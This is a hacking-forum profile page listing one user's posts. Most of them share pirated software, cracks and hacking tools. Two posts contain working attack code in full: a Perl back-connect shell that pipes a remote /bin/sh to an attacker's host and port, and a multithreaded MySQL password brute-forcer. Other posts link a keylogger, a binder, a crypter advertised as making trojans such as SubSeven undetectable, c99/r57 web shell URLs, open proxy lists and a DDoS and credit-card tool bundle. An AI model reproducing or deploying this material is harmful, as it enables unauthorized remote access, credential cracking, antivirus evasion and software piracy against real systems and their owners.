Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. #!/usr/bin/perl # ConnectMe version 1.0 (BackDoor) # IRAN HACKERZ SECURITY TEAM # By Hessam-x # keep Priv8 or die !! # Only for team use Socket; print "---------------------------------------\n"; print "= ConnectMe (Back Backdoor) =\n"; print "= IRAN HACKERZ SECURITY TEAM =\n"; print "= coded by Hessam-x =\n"; print "---------------------------------------\n"; $host = $ARGV[0]; $port = $ARGV[1]; if (!$ARGV[0]) { printf "[!] Usage: perl dc.pl <Host> <Port>\n"; exit(1); } print "[+] Connecting to $host\n"; $prot = getprotobyname('tcp'); # u can change this socket(SERVER, PF_INET, SOCK_STREAM, $prot) || die ("[-] Unable to Connect !"); if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($host))) {die("[-] Unable to Connect !");} open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); print "---------------------------------------\n"; print "= ConnectMe (Back Backdoor) =\n"; print "= IRAN HACKERZ SECURITY TEAM =\n"; print "= coded by Hessam-x =\n"; print "---------------------------------------\n"; exec {'/bin/sh'} '-bash' . "\0" x 4; Videotutorial: http://barzan.persiangig.com/Ro0t%20Video.zip
  2. #!usr/bin/python #MySQL Brute Forcer #You need the MySQLdb package found here: #[url]http://sourceforge.net/projects/mysql-python[/url] #d3hydr8[at]gmail[dot]com import threading, time, random, sys from copy import copy try: import MySQLdb except(ImportError): print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n" sys.exit(1) if len(sys.argv) !=6: print "Usage: ./mysqlbrute.py <server> <port> <database> <userlist> <wordlist>" sys.exit(1) try: users = open(sys.argv[4], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[5], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0" print "\t--------------------------------------------------\n" print "[+] Server:",sys.argv[1] print "[+] Port:",sys.argv[2] print "[+] Database:",sys.argv[3] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words),"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, 1) users.remove(users[0]) lock.release() if len(users) ==1: return value[0][:-1], users[0] else: return value[0][:-1], users[0][:-1] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"*12 print "User:",user,"Password:",value db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2])) print "\t\nLogin successful:",value, user db.close() work.join() sys.exit(2) except(MySQLdb.Error), msg: #print "An error occurred:", msg pass for i in range(len(words)*len(users)): work = Worker() work.start() time.sleep(1)
  3. Ras

    nBinder 5.1

    am primit advertisment pt ca pun crack-uri ca prostu!
  4. THX TO: Activespy Download: http://rapidshare.com/files/36984051/Undetector_1.2.rar
  5. Power Video Converter is designed to meet all your needs of convert file between AVI, MPEG1,MPEG2, VCD, SVCD, DVD, WMV, ASF, DAT, VOB formats. Extremely fast conversion speed and friendly user interface let you convert video files between many formats with ease. The powerful features and unbeatable price make Power Video Converter an affordable and po werful video conversion solution on personal computer. Features includes: * Extreme fast Conversion speed; * Supports AVI, Divx, xvid, MPEG1, MPEG2, ASF, WMV, VOB, DAT; * Batch file conversion; * All supported formats to MPEG1; * All supported formats to MPEG2; * All supported formats to VCD,SVCD,DVD(PAL,NTSC); * All supported formats to AVI(DivX,XviD, MPEG-4); * All supported formats to Windows Media Format (support custom wmv profile); * Joints video files to a large one; * Splits large video file to smaller clips; * Specifies start and end position while convert and joint; * Extract sound from all supported formats to mp3, wav, wma; * Extract images from all supported formats to bmp; * Backup DVD Disk(.VOB) to all supported formats; * Backup DVD Disk(.VOB) music to mp3, wav, wma; * Backup VCD Disk(.DAT) to all supported formats; * Backup VCD Disk(.DAT) music to mp3, wav, wma; * Create custom wmv profile; * Load custom wmv prfile. Homepage: http://www.apussoft.com/ Download: http://rapidshare.com/files/36978439/Power_Video_Converter_v1.5.41.rar
  6. When a password appears on screen as a series of asterisks or dots, you simply view it through SeePassword's magnifying glass to reveal the actual password text. SeePassword has no problems with passwords stored by Internet Explorer -- all the sites will yield their secrets. SeePassword provides users with an easily applied retrieval tool for forgotten passwords. Homepage: nu am gasit Download: http://rapidshare.com/files/36969899/Seepassword_2.05.rar
  7. 1. No warez (asta inseamna fara keygen, crack, serial). 2. Linkul producatorului (Kaspersky chiar are producator si nu ma poti contrazice aici). 3. Ai un warn pentru ca sapamanal iti repet aceleasi lucruri. Kaspersky Anti-Virus combines reactive antivirus detection with the latest proactive technologies to provide your computer with solid and dependable protection against malicious programs.Beginners in particular will be pleasantly surprised to find a product that is simple to install and set up, while more advanced users will find a highly adaptable product that can be easily tailored to suit their individual requirements. Main Advantages: * On-the-fly scanning of emails & Internet traffic * Proactive defense against new malicious programs * Optimized antivirus scanning * Protection from rootkits * Instant database updates * Simplicity and ease of use Key Features: * Protection from viruses, Trojans and worms * Protection from spyware, adware and other potentially hostile programs * Antivirus scanning for removable data storage media * Scanning and disinfection of archived files * Protection from dangerous macros in Mcft Office documents * Rollback of changes made by malicious programs on your computer * Support for Windows Vista™ and 64-bit systems Homepage: www.kaspersky.com Download: http://rapidshare.com/files/36927899/KasperskyAV-700120.rar EDIT scuze nemessis dar mereu uit sa pun homepage pt ca postez si in alte parti si acolo nu pun homepage.
  8. Ras

    Ranguri RST?

    stelutele alea arata super nu se poate pune la ranguri numele cum era inainte? cand era adresa www.rst-crew.net ?
  9. Ras

    Elite Socks 5

    69.64.71.162:80 200.162.6.235:3128 80.80.12.124:80 62.75.163.74:3128 200.87.6.19:3128 84.19.177.62:8080 208.35.118.147:8080 80.80.12.123:80 63.170.15.170:3128 203.113.130.49:80 200.1.10.10:80 201.49.17.30:8080 61.7.156.54:8080 208.108.209.139:3128 220.249.114.134:3128 200.203.216.18:3128 193.251.181.135:8080 203.130.33.67:8080 165.228.132.11:80 58.210.253.101:3128 195.175.37.71:8080 219.93.178.162:3128 69.12.216.240:80 203.113.132.218:80 89.108.83.81:80 83.102.250.50:3128 85.21.59.22:3128 165.228.131.10:3128 80.80.12.125:80 202.106.62.117:80 200.25.196.142:80 165.228.128.10:3128 200.152.204.227:3128 201.234.135.213:3128 200.180.209.212:80 124.17.4.154:3128 61.12.22.154:3128 213.136.42.189:80 84.19.176.62:8080 165.228.130.10:3128 165.228.132.10:3128 59.162.126.119:3128 210.192.124.166:8080 210.192.100.121:8080
  10. Download: http://rapidshare.com/files/36771817/Php_Injection_Scanner-mr.jack.rar
  11. Hard Disk Sentinel is a windows application that will prevent hard disk failure. Hard Disk Sentinel is a hard disk monitoring application to find possible hard disk problems, performance degradations and failures. It can alert if a problem detected or if temperature is too high and it has other reporting options. As hard disk sizes are constantly increasing, data stored on them are more and more valuable for the user of the computer (and this is especially true for a company or office). Serious problems can occur upon a hard disk failure. Hard Disk Sentinel can monitor hard disk status, including temperature and S.M.A.R.T. (Self-Monitoring, Analysis and Reporting Technology, built in most hard disks today) values for each hard disks. Also it measures the hard disk transfer speed in real time which can be used as a benchmark or to detect possible hard disk failures, performance degradations. Hard Disk Sentinel can be used to prevent serious damage or data loss. It warns the user if there will be a problem occur and this gives opportunity to backup important and valuable data. Hard Disk Sentinel runs in the background and constantly analyses hard disk status. If there is an error or unexpected behaviour detected, it warns the user about the current status. Usually, hard disk status may slowly decline, from day to day. The S.M.A.R.T. monitoring technology can help to predict possible failures by monitoring the critical values of the drive. Also it displays the current hard disk temperature(s) and logs previous temperatures which may be used to check the maximum temperature under high hard disk load. Here are some key features of "Hard Disk Sentinel":
  12. free nu se poate! [cel putin asa stiu eu] iar la cel cu plata tot ce trebuie sa faci este sa suni la *222 si sa ii zici lu aia ca vrei sa iti pui internet pe tel... ea o sa te intrebe ce tel ai si tu ii zici modelul... apoi o sa iti trimita un mesaj si o sa urmezi niste setari
  13. imi venea sa vomit cand incepuse sa manance ca***
  14. Download: http://rapidshare.com/files/36650292/Advanced_Invisible_Keylogger_v1.8.rar
  15. Homepage: http://www.nkprods.com/nbinder/ Download: http://rapidshare.com/files/36648901/nbinder_setup.rar
  16. uitati cateva si de la mine C99 ----- http://untnet.eu/w4k.txt? http://reqfer.by.ru/c99.txt? http://geocities.com/napush3nk0/c99.txt? http://read_the_forum_rules.com/files/w4ck1ng.txt? http://www.leetupload.com/database/UNIX/c99.txt? r57 ---- http://www.clientwyre.com/temp/r57.txt?
  17. Ras

    CrackIT v1

    simplu :P
  18. Kismet-2005-08-R NetStumbler-0.4.0 Wellenreiter-v1.9 WEPcrack 0.1.0 airsnort-0.2.7e wepwedgie-0.1.0-alpha Hotspotter-0.4 Advanced Bash-Scripting Guide Bash Guide for Beginners The Linux Network Administrator's Guide, Second Edition Download: http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar
  19. 1. Ddoz Toolz 2. SQL Injection 3. CC [ Credit Card ] 4. IRC Attacking 5. Google Hacker 6. RapidShare Hack Download: http://rapidshare.com/files/36519048/DHC-Hacking-Toolz__AIO_.rar
  20. Astra comprises a new set of services designed specifically for Trillian users. With a strong focus on privacy and security, it allows Trillian users to locate each other, share their IM accounts and dynamic personal information, and communicate anywhere at any time. Over the years, the one point that has been continually driven home to us is performance, whether it means operational speed or memory consumption. We've made some great strides in this realm with Trillian Astra. + Start chatting faster + Redrawing times improved + Network connections are more efficiently managed + Memory usage reduced + Memory leaks plugged + Skin variety with memory in mind Start chatting faster Between loading multiple plugins, parsing and initializing XML-driven skins, and establishing connections to your IM accounts, the time it takes to fully load Trillian has a tendency to decay over time. We've improved performance across the board when loading Trillian to eliminate the needless "wait time" between launching the application and actually using it. Redrawing times improved Little things make a big difference. For Trillian Astra, we spent time discovering why certain controls (a scrollbar, an icon, etc.) took longer to redraw than others and optimized these routines when possible. The differences are measured in milliseconds, but when you're drawing 60+ user icons in a contact list these sub-second times can be the difference between a quick product and a sluggish one. Network connections are more efficiently managed Another minor detail in speeding things up involves the connections Trillian makes to IM services. With Trillian Astra, the routines to handle both incoming and outgoing data have been heavily optimized to ensure a speedy overall IM experience. Memory usage reduced You spoke, we listened. Trillian Astra represents the ultimate in flexible, efficient memory usage; we've reduced the amount of memory required for our XML routines by roughly 5MB and trimmed things here and there whenever possible to decrease footprint further. If pretty graphics aren't for you, using a barebones skin drops memory usage even further. Memory leaks plugged As with all releases of Trillian, time has been spent plugging memory leaks wherever they're found. Skin variety with memory in mind For the absolute minimalists among us, we'll be featuring a super stripped-down skin that will barely register in overall memory usage! As well, we're extending invitations to all current and past skinners to bring their skins into modern Trillian times. We hope to offer as many possibilities as we can by the time our final product is ready, including various best-of-breed third party skins. Your contact list everywhere you go A long-standing feature request, your contact list is now downloaded everytime you start Trillian. That means if you're visiting a friend's house or configuring a new computer, your personalized contact list will stay with you. Add one Trillian Astra IM name and get the rest for free Even with an interoperable instant messaging client, explaining who you are to a new friend is still somewhat of a burden. You have 5 IM accounts; which ones will you hand out? Today's solutions involve long signatures at the end of e-mails and filled-out forms on social networking sites. The burden of trying to equate "John Doe" to a batch of IM names, e-mail addresses, and phone numbers has never been a particularly easy task to automate. With Trillian Astra, your contact information is automatically managed and exported to anyone who requests it (within the privacy restrictions that you define), making it easier than ever to describe your digital presence to your contacts. Social Widgets As we surveyed the best way to develop an interoperable personal information system, frustration with today's solutions and their absolute lack of extensibility and aesthetic appeal was at the forefront of our minds. Comma-delimited lists are now a thing of the past; powered by a dynamic, flexible information store and Flash 9, widgets are visual interpretations of otherwise stagnant user data. The building blocks of a widget are open source, and any aspiring Flash developer can create new widgets to capture and showcase a new piece of information. The backend data structure is not limited in any way, making widgets truly free of restrictions. New login screen and easy guest login With proper support for Windows' Documents & Settings architecture, it's easy to keep your Trillian settings separate from other users on the same PC. The new login screen allows you to log in as an "invisible" user, and guest mode lets visitors log in quickly without leaving any files or personal artifacts behind. Strong encryption and identity verification Trillian Astra also includes the next generation of SecureIM encryption. Astra conversations are secured automatically with a new public-key system, ensuring your communication stays private; encrypted messages intended for you will be useless to anyone else. Public keys help you be sure that you're actually talking to the right person, and not someone who has hijacked another account. Open protocol The protocols used by Trillian Astra are open to any client developer wishing to interoperate with them. Protocol documentation will be published and maintained upon official release. Cerulean Studios is committed to maintaining and supporting interoperable networks. Interoperability is important. It promotes healthy competition between market leaders, opens the door to consumer choice and, in our industry, streamlines reliable and powerful lines of digital communication regardless of your choice of system, protocol, or client. Because not everyone tends to agree with us, with every major release of Trillian we are obligated to keep things up-to-date to ensure that all of Trillian's interoperable parts are running smoothly. MySpace IM and Google Talk Trumping about every other feature request we've received lately was the constant demand for MySpace IM compatibility. So here it is - basic IM and list management, avatars, emoticons and formatted text are all supported. We'll continue to adapt this as the MySpace IM network grows. We've also created a new plugin specifically for Google Talk, breaking it apart from Jabber. File transfers refreshed The protocols involved in establishing a successful file transfer tend to receive minor changes here and there for various reasons. We've worked hard to ensure that Trillian Astra speaks all of these latest languages, and are once again compatible with all the latest versions of major instant messaging file transfer protocols. Sending multiple files is a breeze, Trillian-style Some networks support the idea of "folder transfers" or "bulk file transfers". Because not every major IM service supports this idea, we've always shied away from supporting it "partially" within Trillian. In Astra, we've solved the problem using another technology entirely. Select 5 files on your desktop, drag them to a friend, and Trillian will automatically zip them up and send them as a zip file. Everyone speaks ZIP! A new file transfer window with even more information and utility Our new file transfer window exposes a variety of useful goodies, including total transfer time, a debug window that helps explain exactly what's going on behind the scenes, and an image preview area so you know what file type or image you're receiving before you receive it. More support for status messages, AIM and ICQ interoperability, and MSN gatewaying Beyond file transfers and major design changes, we've worked hard to bring the little things together. Trillian Astra includes support for custom status messages on MSN, and we've finally separated our AIM engine from our ICQ engine, meaning less wasted memory for you if you don't use one of those services. We've also worked hard at improving AIM/ICQ interoperability - when you're an AIM user talking to an ICQ user, your experience should be vastly improved over 3.x. Lastly, we've finally added support for the oft-requested MSN Messenger "gateway" service, ensuring that you can connect to MSN even when port 1863 is blocked! IMCore Historically, building and maintaining support for 5+ major IM services has been a challenge. Compounding the problem were the little bugs that may have appeared in one service but not another service due to slight changes in programming style or even forgetting to fix a bug. With Trillian Astra, every Cerulean plugin is built using the same underlying technology - IMCore. This means that when MSN fails to reconnect properly or can't talk to a SOCKS5 proxy, fixing the bug in one spot will automatically fix it in every other plugin. This speeds up development and reduces the chance for human error. Technically speaking, IMCore is a carefully-designed set of C++ classes that provide the underlying basics needs for ANY IM plugin - communicating with Trillian's API, handling low-level network connectivity, and managing the notions of contact lists, file transfers, etc. OS Windows All (Vista Compatible) Homepage: http://www.ceruleanstudios.com/ Download: http://rapidshare.com/files/36512584/Trillian.Astra.v4.0.Build.45.rar
  21. description?
  22. Ras

    CrackMe

    Acesta este primul meu crackme, l-am facut in visual basic 6, dificultatea zic eu ca este usoara. Astept pareri din partea voastra Download: http://rapidshare.com/files/36473068/CrackMe_By_Ras.rar
  23. Joins up to 4096 files Able to join any files (images, icons, pdfs, etc), as the default viewer will be used You can set icon for created executable from an *.ico, *.exe or *.dll file Joined files are encrypted Joined files can be packed with internal packer (ratio is better then zip) Tiny loader stub: 2048 bytes Created file can be packed with any exe-packer (UPX, ASPack, etc) Per-file advanced options, custom visibility flags, command line arguments, file attributes, etc. Posibility to register DLL (OCX) files when using VB applications Melting option which allows to ovewrite/delete created executable after all files have been executed Works under 95/98/2k/XP/2k3 (tested alot) Supports file drag & drop (GUI) Full Windows XP themes support (GUI) Saving/Loading projects (GUI) English & Russian interfaces (GUI) Download: http://rapidshare.com/files/36418044/mj17.zip
  24. Author: xyr0x Date: 4/20/2007 Platforms: All Windows Platforms Undetectable as of 4/20/2007. Contact: AIM: ixi xyr0x ixi MSN: [email]imaleethacker@hotmail.com[/email] Yahoo!: lll_x_xyr0x_x_lll -RAR Password- cryptX NOTE: For each crypted file, the crypted file will copy itself to the index directory (Where you launched CryptX from, and will save it as crypted.exe) You'll need to put that file into a new file location. NOTE: When CryptX is unloaded, it'll cause an invalid window call, just click Cancel or No, on debug, and everything is saucy. ::Disclaimer:: In no way am I responsible for any unethical/illegal useages of CryptX! Please use this CryptX was made for educational purposes only. Please use this at your own risk. ::How it works?:: CryptX adds false code by Denoted bits of data to the PE Header and Entry point, thus confusing anti-virus hueristics. on randmomized 33555.59 Data variation. (the more you crypt the binary, the more different the outcome will be) Some notes: After you've crypted the binary you may find it useful to pack it with a PE Packer. I recommend MEW 11, as being the most reliable and effective for packing distributable binaries. Please use this at your own risk, as I am not responsible for any damage or data loss using CryptX. Enjoy CryptX! Undetectable Status FUNCTIONALITY AND STABLIZATION AFTER CRYPTED MAY VARY, AND DEPENDING ON EACH VARIANT MAYBE DIFFERENT FROM ANOTHER. I CRYPTED ONE OF EACH OF THE FOLLOWING TROJANS, THEREFOR I AM JUST MAKING A "LOGICAL" GUESS THAT IT WILL MAKE THE OTHER VARIATIONS THE SAME.] MoSucker - all variations. SubSeven - all variations. C.I.A - all variations. Net Devil - all variations. Optix Pro - all variations. DoS 5.5 - all variations. Assorted Virii, worms, et cetera effectivelly made undetected by CryptX 1.0 If you crypt MyDoom, or some other serious shit, don't be dumb, and re-populate it. Thanks. Download: http://rapidshare.com/files/36417385/CryptX_1.0.rar
  25. Ras

    XSS Scanner v1.3

    nici eu nu l-am probat... netu imi merge praf de 2 zile... mor X(
×
×
  • Create New...